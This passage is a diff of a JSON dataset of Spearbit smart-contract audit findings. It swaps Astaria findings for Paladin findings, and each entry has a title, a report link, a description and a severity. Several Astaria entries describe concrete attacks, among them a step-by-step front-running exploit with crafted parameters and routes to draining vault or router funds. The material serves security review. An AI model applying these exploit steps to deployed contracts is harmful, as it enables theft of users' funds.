modifier. This modifier checks if msg.sender is questBoard or owner. However, the QuestBoard.sol contract has a QuestID registration and a token whitelisting mechanism which should be used in combination with addQuest() function. If owner accidentally calls addQuest(), the QuestBoard.sol contract will not be able to call addQuest() for that questID. As soon as createQuest() tries to add that same questID the function will revert, becoming uncallable because nextID still maintains that same value. function createQuest(...) ... { ... uint256 newQuestID = nextID; nextID += 1; ... require(MultiMerkleDistributor(distributor).addQuest(newQuestID, rewardToken), \"QuestBoard: Fail add to Distributor\"); ... ,! } 8 function addQuest(uint256 questID, address token) external onlyAllowed returns(bool) { require(questRewardToken[questID] == address(0), \"MultiMerkle: Quest already listed\"); require(token != address(0), \"MultiMerkle: Incorrect reward token\"); // Add a new Quest using the QuestID, and list the reward token for that Quest questRewardToken[questID] = token; emit NewQuest(questID, token); return true; } Note: Set to medium risk because the likelihood of this happening is low, but the impact is high.", "labels": [ "Spearbit", - "Astaria", - "Severity: Critical Risk" + "Paladin", + "Severity: Medium Risk" ] }, { - "title": "Inequalities involving liquidationInitialAsk and potentialDebt can be broken when buyoutLien is called", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "When we commit to a new lien, the following gets checked to be true for all j 2 0, (cid:1) (cid:1) (cid:1) , n (cid:0) 1: onew + on(cid:0)1 + (cid:1) (cid:1) (cid:1) + oj (cid:20) Lj where: parameter description oi onew n Li L0 k k A0 k _getOwed(newStack[i], newStack[i].point.end) _getOwed(newSlot, newSlot.point.end) stack.length newStack[i].lien.details.liquidationInitialAsk params.encumber.lien.details.liquidationInitialAsk params.position params.encumber.amount 12 so in a stack in general we should have the: But when an old lien is replaced with a new one, we only perform the following checks for L0 k : (cid:1) (cid:1) (cid:1) + oj+1 + oj (cid:20) Lj 0 0 0 k ^ L k (cid:21) A L k > 0 And thus we can introduce: L0 o0 k (cid:28) Lk or k (cid:29) ok (by pushing the lien duration) which would break the inequality regarding oi s and Li . If the inequality is broken, for example, if we buy out the first lien in the stack, then if the lien expires and goes into a Seaport auction the auction's starting price L0 would not be able to cover all the potential debts even at the beginning of the auction.", + "title": "Reduce impact of emergencyUpdatequestPeriod()", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Paladin-Spearbit-Security-Review.pdf", + "body": "Function emergencyUpdatequestPeriod() allows the merkle tree to be updated. The merkle tree contains an embedded index parameter which is used to prevent double claims. When the merkleRoot is updated, the layout of indexes in the merkle tree could become different. Example: Suppose the initial merkle tree contains information for: - user A: index=1, account = 0x1234, amount=100 - user B: index=2, account = 0x5689, amount=200 Then user A claims => _setClaimed(..., 1) is set. Now it turns out a mistake is made with the merkle tree, and it should contain: - user B: index=1, account = 0x5689, amount=200 - user C: index=2, account = 0xabcd, amount=300 Now user B will not be able to claim because bit 1 has already been set. Under this situation the following issues can occur: Someone who has already claimed might be able to claim again. Someone who has already claimed has too much. Someone who has already claimed has too little, and cannot longer claim the rest because _setClaimed() has already been set. someone who has not yet claimed might not be able to claim because _setClaimed() has already been set by another user. Note: Set to medium risk because the likelihood of this happening is low, but the impact is high.", "labels": [ "Spearbit", - "Astaria", - "Severity: High Risk" + "Paladin", + "Severity: Medium Risk" ] }, { - "title": "VaultImplementation.buyoutLien can be DoSed by calls to LienToken.buyoutLien (cid:1) (cid:1) (cid:1) + oj+1 + oj (cid:20) Lj", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "Anyone can call into LienToken.buyoutLien and provide params of the type LienActionBuyout: params.incoming is not used, so for example vault signatures or strategy validation is skipped. There are a few checks for params.encumber. Let's define the following variables: parameter value i kj tj ej e0 i lj l 0 i rj r 0 i c params.position params.encumber.stack[j].point.position params.encumber.stack[j].point.last params.encumber.stack[j].point.end tnow + D0 i params.encumber.stack[j].point.lienId i )) where h is the keccak256 of the encoding i , r 0 i , c0 i , S0 i , D0 i , V 0 i , (A0max h(N 0 i , P 0 i , L0 params.encumber.stack[j].lien.details.rate : old rate params.encumber.lien.details.rate : new rate params.encumber.collateralId 13 parameter value cj c0 i Aj A0 i Amax j A0max i R Nj N 0 i Vj V 0 i Sj S0 i Dj D0 i Pj P0 i Lj L0 i Imin Dmin tnow bi o oj n params.encumber.stack[j].lien.collateralId params.encumber.lien.collateralId params.encumber.stack[j].point.amount params.encumber.amount params.encumber.stack[j].lien.details.maxAmount params.encumber.lien.details.maxAmount params.encumber.receiver params.encumber.stack[j].lien.token params.encumber.lien.token params.encumber.stack[j].lien.vault params.encumber.lien.vault params.encumber.stack[j].lien.strategyRoot params.encumber.lien.strategyRoot params.encumber.stack[j].lien.details.duration params.encumber.lien.details.duration params.encumber.stack[j].lien.details.maxPotentialDebt params.encumber.lien.details.maxPotentialDebt params.encumber.stack[j].lien.details.liquidationInitialAsk params.encumber.lien.details.liquidationInitialAsk AstariaRouter.s.minInterestBPS AstariaRouter.s.minDurationIncrease block.timestamp buyout _getOwed(params.encumber.stack[params.position], block.timestamp) _getOwed(params.encumber.stack[j], params.encumber.stack[j].point.end) params.encumber.stack.length O = o0 + o1 + (cid:1) (cid:1) (cid:1) + on(cid:0)1 _getMaxPotentialDebtForCollateral(params.encumber.stack) sj s0 i params.encumber.stack[j] newStack Let's go over the checks and modifications that buyoutLien does: 1. validateStack is called to make sure that the hash of params.encumber.stack matches with s.collateralStateHash value of c. This is not important and can be bypassed by the exploit even after the fix for Issue 106. 2. _createLien is called next which does the following checks: 2.1. c is not up for auction. 2.2. We haven't reached max number of liens, currently set to 5. 2.3. L0 > 0 2.4. If params.encumber.stack is not empty then c0 i , (A0max i , L0 i )) where h is the hashing mechanism of encoding and then taking the keccak256. 2.6 The new stack slot and i = c0 2.5. We _mint a new lien for R with id equal to h(N 0 i and L0 i (cid:21) A0 i , V 0 i , D0 i , S0 i , P 0 i , c0 , r 0 i i 14 the new lien id is returned. 3. isValidRefinance is called which performs the following checks: 3.1. checks c0 i = c0 3.2. checks either or (r 0 i < ri (cid:0) Imin) ^ (e0 i (cid:21) ei ) i i (cid:20) ri ) ^ (e0 (r 0 is in auction by checking s.collateralStateHash's value. i (cid:21) ei + Dmin) 4. check where c0 i 5. check O (cid:20) P0 i . 6. check A0max (cid:21) o. 7. send wETH through TRANSFER_PROXY from msg.sender to payee of li with the amount of bi . 8. if payee of li is a public vault, do some book keeping by calling handleBuyoutLien. 9. call _replaceStackAtPositionWithNewLien to: 9.1. replace si with s0 9.2. _burn li . 9.3. delete s.lienMeta of li . i in params.encumber.stack. So in a nutshell the important checks are: c, ci are not in auction (not important for the exploit) c0 i = c0 i and L0 n is less than or equal to max number of allowed liens ( 5 currently) (not important for the exploit) L0 i (cid:21) A0 O (cid:20) P0 i A0max i > 0 (cid:21) o i or (r 0 i < ri (cid:0) Imin) ^ (e0 i (cid:21) ei ) i (cid:20) ri ) ^ (e0 (r 0 i (cid:21) ei + Dmin) Exploit An attacker can DoS the VaultImplementation.buyoutLien as follows: 1. A vault decides to buy out a collateral's lien to offer better terms and so signs a commitment and some- one on behalf of the vault calls VaultImplementation.buyoutLien which if executed would call LienTo- ken.buyoutLien with the following parameters: 15 LienActionBuyout({ incoming: incomingTerms, position: position, encumber: ILienToken.LienActionEncumber({ collateralId: collateralId, amount: incomingTerms.lienRequest.amount, receiver: recipient(), lien: ROUTER().validateCommitment({ commitment: incomingTerms, timeToSecondEpochEnd: _timeToSecondEndIfPublic() }), stack: stack }) }) 2. The attacker fronrun the call from step 1. and instead provide the following modified parameters to LienTo- ken.buyoutLien LienActionBuyout({ incoming: incomingTerms, // not important, since it is not used and can be zeroed-out to save tx gas position: position, encumber: ILienToken.LienActionEncumber({ collateralId: collateralId, amount: incomingTerms.lienRequest.amount, receiver: msg.sender, // address of the attacker lien: ILienToken.Lien({ // note that the lien here would have the same fields as the original message by the vault rep. ,! token: address(s.WETH), vault: incomingTerms.lienRequest.strategy.vault, // address of the vault offering a better term strategyRoot: incomingTerms.lienRequest.merkle.root, collateralId: collateralId, details: details // see below }), stack: stack }) }) Where details provided by the attacker can be calculated by using the below snippet: uint8 nlrType = uint8(_sliceUint(commitment.lienRequest.nlrDetails, 0)); (bytes32 leaf, ILienToken.Details memory details) = IStrategyValidator( s.strategyValidators[nlrType] ).validateAndParse( commitment.lienRequest, s.COLLATERAL_TOKEN.ownerOf( commitment.tokenContract.computeId(commitment.tokenId) ), commitment.tokenContract, commitment.tokenId ); The result is that: The newLienId that was supposed to be _minted for the recipient() of the vault, gets minted for the at- tacker. The call to VaultImplementation.buyoutLien would fail, since the newLienId is already minted, and so the vault would not be able to receives the interests it had anticipated. When there is a payment or Seaport auction settlement, the attacker would receive the funds instead. 16 The attacker can intorduces a malicous contract into the protocol ken.ownerOf(newLienId) without needing to register for a vault. that would be LienTo- To execute this attack, the attacker would need to spend the buyout amount of assets. Also the attacker does not necessarily need to front run a transaction to buyout a lien. They can pick their own hand-crafted parameters that would satisfy the conditions in the analysis above to introduce themselves in the protocol.", + "title": "Verify the correct merkle tree is used", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Paladin-Spearbit-Security-Review.pdf", + "body": "The MultiMerkleDistributor.sol contract does not verify that the merkle tree belongs to the right quest and period. If the wrong merkle tree is added then the wrong rewards can be claimed. Note: Set to medium risk because the likelihood of this happening is low, but the impact is high.", "labels": [ "Spearbit", - "Astaria", - "Severity: High Risk" + "Paladin", + "Severity: Medium Risk" ] }, { - "title": "VaultImplementation.buyoutLien does not update the new public vault's parameters and does not transfer assets between the vault and the borrower", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "VaultImplementation.buyoutLien does not update the accounting for the vault (if it's public). The slope, yIntercept, and s.epochData[...].liensOpenForEpoch (for the new lien's end epoch) are not updated. They are updated for the payee of the swapped-out lien if the payee is a public vault by calling handleBuyoutLien. Also, the buyout amount is paid out by the vault itself. The difference between the new lien amount and the buyout amount is not worked out between the msg.sender and the new vault.", + "title": "Prevent mixing rewards from different quests and periods", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Paladin-Spearbit-Security-Review.pdf", + "body": "The MultiMerkleDistributor.sol contract does not verify that the sum of all amounts in the merkle tree are equal to the rewards allocated for that quest and for that period. This could happen if there is a bug in the merkle tree creation script. If the sum of the amounts is too high, then tokens from other quests or other periods could be claimed, which will give problems later on, when claims are done for the other quest/periods. Note: Set to medium risk because the likelihood of this happening is low, but the impact is high.", "labels": [ "Spearbit", - "Astaria", - "Severity: High Risk" + "Paladin", + "Severity: Medium Risk" ] }, { - "title": "setPayee doesn't update y intercept or slope, allowing vault owner to steal all funds", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "When setPayee() is called, the payment for the lien is no longer expected to go to the vault. How- ever, this change doesn't impact the vault's y-intercept or slope, which are used to calculate the vault's totalAs- sets(). This can be used maliciously by a vault owner to artificially increase their totalAssets() to any arbitrary amount: Create a lien from the vault. SetPayee to a non-vault address. Buyout the lien from another vault (this will cause the other vault's y-int and slope to increase, but will not impact the y-int and slope of the original vault because it'll fail the check on L165 that payee is a public vault. Repeat the process again going the other way, and repeat the full cycle until both vault's have desired totalAssets(). For an existing vault, a vault owner can withdraw a small amount of assets each epoch. If, in any epoch, they are one of the only users withdrawing funds, they can perform this attack immediately before the epoch is pro- cessed. The result is that the withdrawal shares will by multiplied by totalAssets() / totalShares() to get the withdrawal rate, which can be made artificially high enough to wipe out the entire vault.", + "title": "Nonexistent zero address check for newQuestBoard in updateQuestManager function", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Paladin-Spearbit-Security-Review.pdf", + "body": "Nonexistent zero address check for newQuestBoard in updateQuestManager function. Assigning newQuestBoard to a zero address may cause unintended behavior.", "labels": [ "Spearbit", - "Astaria", - "Severity: High Risk" + "Paladin", + "Severity: Low Risk" ] }, { - "title": "settleAuction() doesn't check if the auction was successful", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "settleAuction() is a privileged functionality called by LienToken.payDebtViaClearingHouse(). settleAuction() is intended to be called on a successful auction, but it doesn't verify that that's indeed the case. Anyone can create a fake Seaport order with one of its considerations set as the CollateralToken as described in Issue 93. Another potential issue is if the Seaport orders can be \"Restricted\" in future, then there is a possibility for an authorized entity to force settleAuction on CollateralToken, and when SeaPort tries to call back on the zone to validate it would fail.", + "title": "Verify period is always a multiple of week", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Paladin-Spearbit-Security-Review.pdf", + "body": "The calculations with period assume that period is a multiple of WEEK. However, period is often assigned as a parameter and not verified if it is a multiple of WEEK. This calculation may cause unexpected results. Note: When it is verified that period is a multiple of WEEK, the following calculation can be simplified: - int256 nextPeriod = ((period + WEEK) / WEEK) * WEEK; + int256 nextPeriod = period + WEEK; The following function does not explicitly verify that period is a multiple of WEEK. function closeQuestPeriod(uint256 period) external isAlive onlyAllowed nonReentrant { ... uint256 nextPeriod = ((period + WEEK) / WEEK) * WEEK; ... } function getQuestIdsForPeriod(uint256 period) external view returns(uint256[] memory) { ... } function closePartOfQuestPeriod(uint256 period, uint256[] calldata questIDs) ... { ... } function addMerkleRoot(uint256 questID, uint256 period, bytes32 merkleRoot) ... { ... } function addMultipleMerkleRoot(..., uint256 period, ...) external isAlive onlyAllowed nonReentrant { ... } ,! function claim(..., uint256 period, ...) public { ... } function updateQuestPeriod(uint256 questID, uint256 period, bytes32 merkleRoot) ... { ... } function emergencyUpdatequestPeriod(uint256 questID, uint256 period, bytes32 merkleRoot) ... { ... } function claimQuest(address account, uint256 questID, ClaimParams[] calldata claims) external { ,! ... // also uses period as part of the claims array require(questMerkleRootPerPeriod[claims[i].questID][claims[i].period] != 0, \"MultiMerkle: not updated yet\"); require(!isClaimed(questID, claims[i].period, claims[i].index), \"MultiMerkle: already claimed\"); ... require( MerkleProof.verify(claims[i].merkleProof, questMerkleRootPerPeriod[questID][claims[i].period], ,! node), \"MultiMerkle: Invalid proof\" ); ... _setClaimed(questID, claims[i].period, claims[i].index); ... emit Claimed(questID, claims[i].period, claims[i].index, claims[i].amount, rewardToken, account); ... }", "labels": [ "Spearbit", - "Astaria", - "Severity: High Risk" + "Paladin", + "Severity: Low Risk QuestBoard.sol#L201-L203, QuestBoard.sol#L750-L815," ] }, { - "title": "Incorrect auction end validation in liquidatorNFTClaim()", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "liquidatorNFTClaim() does the following check to recognize that Seaport auction has ended: if (block.timestamp < params.endTime) { //auction hasn't ended yet revert InvalidCollateralState(InvalidCollateralStates.AUCTION_ACTIVE); } Here, params is completely controlled by users and hence to bypass this check, the caller can set params.endTime to be less than block.timestamp. Thus, a possible exploit scenario occurs when AstariaRouter.liquidate() is called to list the underlying asset on Seaport which also sets liquidator address. Then, anyone can call liquidatorNFTClaim() to transfer the underlying asset to liquidator by setting params.endTime < block.timestamp.", + "title": "Missing safety check to ensure array length does not underflow and revert", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Paladin-Spearbit-Security-Review.pdf", + "body": "Several functions use questPeriods[questID][questPeriods[questID].length - 1]. The sec- ond value in the questPeriods mapping is questPeriods[questID].length - 1. It is possible for this function to revert if the case arises where questPeriods[questID].length is 0. Looking at the code this is not likely to occur but it is a valid safety check that covers possible strange edge cases. function _getRemainingDuration(uint256 questID) internal view returns(uint256) { ... uint256 lastPeriod = questPeriods[questID][questPeriods[questID].length - 1]; ... } function increaseQuestDuration(...) ... { ... uint256 lastPeriod = questPeriods[questID][questPeriods[questID].length - 1]; ... } function increaseQuestReward(...) ... { ... uint256 lastPeriod = questPeriods[questID][questPeriods[questID].length - 1]; ... } function increaseQuestObjective(... ) ... { ... uint256 lastPeriod = questPeriods[questID][questPeriods[questID].length - 1]; ... }", "labels": [ "Spearbit", - "Astaria", - "Severity: High Risk" + "Paladin", + "Severity: Low Risk" ] }, { - "title": "Typed structured data hash used for signing commitments is calculated incorrectly", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "Since STRATEGY_TYPEHASH == keccak256(\"StrategyDetails(uint256 nonce,uint256 deadline,bytes32 root)\") The hash calculated in _encodeStrategyData is incorrect according to EIP-712. s.strategistNonce is of type uint32 and the nonce type used in the type hash is uint256. Also the struct name used in the typehash collides with StrategyDetails struct name defined as: 19 struct StrategyDetails { uint8 version; uint256 deadline; address vault; }", + "title": "Prevent dual entry point tokens", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Paladin-Spearbit-Security-Review.pdf", + "body": "Function recoverERC20() in contract QuestBoard.sol only allows the retrieval of non whitelisted tokens. Recently an issue has been found to circumvent these checks, with so called dual entry point tokens. See a description here: compound-tusd-integration-issue-retrospective function recoverERC20(address token, uint256 amount) external onlyOwner returns(bool) { require(!whitelistedTokens[token], \"QuestBoard: Cannot recover whitelisted token\"); IERC20(token).safeTransfer(owner(), amount); return true; } 13", "labels": [ "Spearbit", - "Astaria", - "Severity: High Risk" + "Paladin", + "Severity: Low Risk" ] }, { - "title": "makePayment doesn't properly update stack, so most payments don't pay off debt", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "As we loop through individual payment in _makePayment, each is called with: (newStack, spent) = _payment( s, stack, uint8(i), totalCapitalAvailable, address(msg.sender) ); This call returns the updated stack as newStack but then uses the function argument stack again in the next iteration of the loop. The newStack value is unused until the final iterate, when it is passed along to _updateCollateralStateHash(). This means that the new state hash will be the original state with only the final loan repaid, even though all other loans have actually had payments made against them.", + "title": "Limit the creation of quests", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Paladin-Spearbit-Security-Review.pdf", + "body": "The function getQuestIdsForPeriod() could run out of gas if someone creates an enormous amount of quests. See also: what-is-the-array-size-limit-of-a-returned-array. Note: If this were to happen, the QuestIds can also be retrieved directly from the getter of questsByPeriod(). Note: closeQuestPeriod() has the same problem, but closePartOfQuestPeriod() is a workaround for this. Requiring a minimal amount of tokens to create a quest can limit the number of quests. The minimum number of tokens to pay is: duration * minObjective * minRewardPerVotePerToken[]. The values of duration and minObjective are least 1, but minRewardPerVotePerToken[] could be 0 and even if minRewardPerVotePerToken is non zero but still low, the number of tokes required is neglectable when using tokens with 18 decimals. Requiring a minimum amount of tokens also helps to prevent the creation of spam quests. 14 function getQuestIdsForPeriod(uint256 period) external view returns(uint256[] memory) { return questsByPeriod[period]; // could run out of gas } function createQuest(...) { ... require(duration > 0, \"QuestBoard: Incorrect duration\"); require(objective >= minObjective, \"QuestBoard: Objective too low\"); ... require(rewardPerVote >= minRewardPerVotePerToken[rewardToken], \"QuestBoard: RewardPerVote too low\"); ... vars.rewardPerPeriod = (objective * rewardPerVote) / UNIT; // can be 0 ==> totalRewardAmount can be 0 require((totalRewardAmount * platformFee)/MAX_BPS == feeAmount, \"QuestBoard: feeAmount incorrect\"); // feeAmount can be 0 ... require((vars.rewardPerPeriod * duration) == totalRewardAmount, \"QuestBoard: totalRewardAmount incorrect\"); ... IERC20(rewardToken).safeTransferFrom(vars.creator, address(this), totalRewardAmount); IERC20(rewardToken).safeTransferFrom(vars.creator, questChest, feeAmount); ... ,! ,! ,! ,! } constructor(address _gaugeController, address _chest){ ... minObjective = 1000 * UNIT; // initial value, but can be overwritten ... } function updateMinObjective(uint256 newMinObjective) external onlyOwner { require(newMinObjective > 0, \"QuestBoard: Null value\"); // perhaps set higher minObjective = newMinObjective; } function whitelistToken(address newToken, uint256 minRewardPerVote) public onlyAllowed { // geen isAlive??? ... minRewardPerVotePerToken[newToken] = minRewardPerVote; // no minimum value required ... ,! }", "labels": [ "Spearbit", - "Astaria", - "Severity: High Risk" + "Paladin", + "Severity: Low Risk" ] }, { - "title": "_removeStackPosition() always reverts", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "removeStackPosition() always reverts since it calls stack array for an index beyond its length: for (i; i < length; ) { unchecked { newStack[i] = stack[i + 1]; ++i; } } Notice that for i==length-1, stack[length] is called. This reverts since length is the length of stack array. Additionally, the intention is to delete the element from stack at index position and shift left the elements ap- pearing after this index. However, an addition increment to the loop index i results in newStack[position] being empty, and the shift of other elements doesn't happen.", + "title": "Non existing states are considered active", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Paladin-Spearbit-Security-Review.pdf", + "body": "periods- if a state is checked of a non existing However, ByQuest[questIDs[i]][period] is active. questIDs[i] or a questID that has no quest in that period, then periodsByQuest[questIDs[i]][period] is empty and periodsByQuest[questIDs[i]][period].currentState == 0. closePartOfQuestPeriod() function verifies state the of if As PeriodState.ACTIVE ==0, the stated is considered to be active and the require() doesnt trigger and pro- cessing continues. Luckily as all other values are also 0 (especially _questPeriod.rewardAmountPerPeriod), toDistributeAmount will be 0 and no tokens are sent. However slight future changes in the code might introduce unwanted effects. enum PeriodState { ACTIVE, CLOSED, DISTRIBUTED } // ACTIVE == 0 function closePartOfQuestPeriod(uint256 period, uint256[] calldata questIDs) external isAlive ,! onlyAllowed nonReentrant { ... for(uint256 i = 0; i < length;){ ... require( periodsByQuest[questIDs[i]][period].currentState == PeriodState.ACTIVE, // doesn't work ,! if questIDs[i] & period are empty \"QuestBoard: Period already closed\" );", "labels": [ "Spearbit", - "Astaria", - "Severity: High Risk" + "Paladin", + "Severity: Low Risk" ] }, { - "title": "Refactor _paymentAH()", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "_paymentAH() has several vulnerabilities: stack is a memory parameter. So all the updates made to stack are not applied back to the corresponding storage variable. No need to update stack[position] as it's deleted later. decreaseEpochLienCount() is always passed 0, as stack[position] is already deleted. Also decreaseEp- ochLienCount() expects epoch, but end is passed instead. This if/else block can be merged. updateAfterLiquidationPayment() expects msg.sender to be LIEN_- TOKEN, so this should work.", + "title": "Critical changes should use two-step process", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Paladin-Spearbit-Security-Review.pdf", + "body": "The QuestBoard.sol, QuestTreasureChest.sol and QuestTreasureChest.sol contracts inherit from OpenZeppelins Ownable contract which enables the onlyOwner role to transfer ownership to another address. Its possible that the onlyOwner role mistakenly transfers ownership to the wrong address, resulting in a loss of the onlyOwner role. This is an unwanted situation because the owner role is neccesary for several methods.", "labels": [ "Spearbit", - "Astaria", - "Severity: High Risk" + "Paladin", + "Severity: Low Risk" ] }, { - "title": "processEpoch() needs to be called regularly", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "If the processEpoch() endpoint does not get called regularly (especially close to the epoch bound- aries), the updated currentEpoch would lag behind the actual expected value and this will introduce arithmetic errors in formulas regarding epochs and timestamps.", + "title": "Prevent accidental call of emergencyUpdatequestPeriod()", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Paladin-Spearbit-Security-Review.pdf", + "body": "Functions updateQuestPeriod() and emergencyUpdatequestPeriod() are very similar. However, if function emergencyUpdatequestPeriod() is accidentally used instead of updateQuestPeriod(), then period isnt push()ed to the array questClosedPeriods[]. This means function getClosedPeriodsByQuests() will not be able to retreive all the closed periods. function updateQuestPeriod(uint256 questID, uint256 period, bytes32 merkleRoot) external onlyAllowed returns(bool) { ... questClosedPeriods[questID].push(period); ... questMerkleRootPerPeriod[questID][period] = merkleRoot; ... ,! } function emergencyUpdatequestPeriod(uint256 questID, uint256 period, bytes32 merkleRoot) external onlyOwner returns(bool) { ... // no push() questMerkleRootPerPeriod[questID][period] = merkleRoot; ... ,! }", "labels": [ "Spearbit", - "Astaria", - "Severity: High Risk" + "Paladin", + "Severity: Low Risk" ] }, { - "title": "Can create lien for collateral while at auction by passing spoofed data", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "In the createLien function, we check that the collateral isn't currently at auction before giving a lien with the following check: if ( s.collateralStateHash[params.collateralId] == bytes32(\"ACTIVE_AUCTION\") ) { revert InvalidState(InvalidStates.COLLATERAL_AUCTION); } However, collateralId is passed in multiple places in the params: params.encumber.lien. both in params directly and in 23 The params.encumber.lien.collateralId is used everywhere else, and is the final value that is used. But the check is performed on params.collateralId. As a result, we can set the following: params.encumber.lien.collateralId: collateral that is at auction. params.collateralId: collateral not at auction. This will allow us to pass this validation while using the collateral at auction for the lien.", + "title": "Usage of deprecated safeApprove", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Paladin-Spearbit-Security-Review.pdf", + "body": "OpenZeppelin safeApprove implementation is deprecated. Reference. Using this deprecated func- tion can lead to unintended reverts and potential locking of funds. SafeERC20.safeApprove() Insecure Behaviour.", "labels": [ "Spearbit", - "Astaria", - "Severity: High Risk" + "Paladin", + "Severity: Low Risk" ] }, { - "title": "stateHash isn't updated by buyoutLien function", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "We never update the collateral state hash anywhere in the buyoutLien function. As a result, once all checks are passed, payment will be transferred from the buyer to the seller, but the seller will retain ownership of the lien in the system's state.", + "title": "questID on the NewQuest event should be indexed", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Paladin-Spearbit-Security-Review.pdf", + "body": "The NewQuest event currently does not have questID set to indexed which goes against the pattern set by the other events in the contract where questID is actually indexed.", "labels": [ "Spearbit", - "Astaria", - "Severity: High Risk" + "Paladin", + "Severity: Low Risk" ] }, { - "title": "If a collateral's liquidation auction on Seaport ends without a winning bid, the call to liquidatorN- FTClaim does not clear the related data on LienToken's side and also for payees that are public vaults", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "If/when a liquidation auction ends without being fulfilled/matched on Seaport and afterward when the current liquidator calls into liquidatorNFTClaim, the storage data (s.collateralStateHash, s.auctionData, s.lienMeta) on the LienToken side don't get reset/cleared and also the lien token does not get burnt. That means: s.collateralStateHash[collateralId] stays equal to bytes32(\"ACTIVE_AUCTION\"). s.auctionData[collateralId] will have the past auction data. s.lienMeta[collateralId].atLiquidation will be true. That means future calls to commitToLiens by holders of the same collateral will revert.", + "title": "Add validation checks on addresses", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Paladin-Spearbit-Security-Review.pdf", + "body": "Missing validation checks on addresses passed into the constructor functions. Adding these checks on _gaugeController and _chest can prevent costly errors the during deployment of the contract. Also in function claim() and claimQuest() there is no zero check for for account argument.", "labels": [ "Spearbit", - "Astaria", - "Severity: High Risk" + "Paladin", + "Severity: Low Risk" ] }, { - "title": "ClearingHouse cannot detect if a call from Seaport comes from a genuine listing or auction", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "Anyone can create a SeaPort order with one of the considerations' recipients set to a ClearingHouse with a collateralId that is genuinely already set for auction. Once the spoofed order settles, SeaPort calls into this fallback function and causes the genuine Astaria auction to settle. This allows an attacker to set random items on sale on SeaPort with funds directed here (small buying prices) to settle genuine Astaria auctions on the protocol. This causes: The Astaria auction payees and the liquidator would not receive what they would expect that should come from the auction. And if payee is a public vault it would introduce incorrect parameters into its system. Lien data (s.lienMeta[lid]) and the lien token get deleted/burnt. Collateral token and data get burnt/deleted. When the actual genuine auction settles and calls back s.collateralIdToAuction[collateralId] check. to here, it will revert due to", + "title": "Changing public constant variables to non-public can save gas", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Paladin-Spearbit-Security-Review.pdf", + "body": "Several constants are public and thus have a getter function. called from the outside, therefore it is not necessary to make them public. It is unlikely for these values to be", "labels": [ "Spearbit", - "Astaria", - "Severity: High Risk" + "Paladin", + "Severity: Gas Optimization" ] }, { - "title": "c.lienRequest.strategy.vault is not checked to be a registered vault when commitToLiens is called", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "mentation(c.lienRequest.strategy.vault).commitToLien( ... ) of c.lienRequest.strategy.vault is not checked whether it is a registered vault within the system (by checking s.vaults). The caller can set this value to any address they would desire and potentially perform some unwanted actions. For example, the user could spoof all the values in commitments so that the later dependant contracts' checks are skipped and lastly we end up transferring funds: value after and the s.TRANSFER_PROXY.tokenTransferFrom( address(s.WETH), address(this), // <--- AstariaRouter address(msg.sender), totalBorrowed ); Not that since all checks are skipped, the caller can also indirectly set totalBorrowed to any value they would desire. And so, if AstariaRouter would hold any wETH at any point in time. Anyone can craft a payload to commitToLiens to drain its wETH balance.", + "title": "Using uint instead of bool to optimize gas usage", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Paladin-Spearbit-Security-Review.pdf", + "body": "A bool is more costly than uint256. Because each write action generates an additional SLOAD to read the contents of the slot, change the bits occupied by bool and finally write back. contract BooleanTest { mapping(address => bool) approvedManagers; // Gas Cost : 44144 function approveManager(address newManager) external{ approvedManagers[newManager] = true; } mapping(address => uint256) approvedManagersWithoutBoolean; // Gas Cost : 44069 function approveManagerWithoutBoolean(address newManager) external{ approvedManagersWithoutBoolean[newManager] = 1; } }", "labels": [ "Spearbit", - "Astaria", - "Severity: High Risk" + "Paladin", + "Severity: Gas Optimization" ] }, { - "title": "Anyone can take a loan out on behalf of any collateral holder at any terms", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "In the _validateCommitment() function, the initial checks are intended to ensure that the caller who is requesting the lien is someone who should have access to the collateral that it's 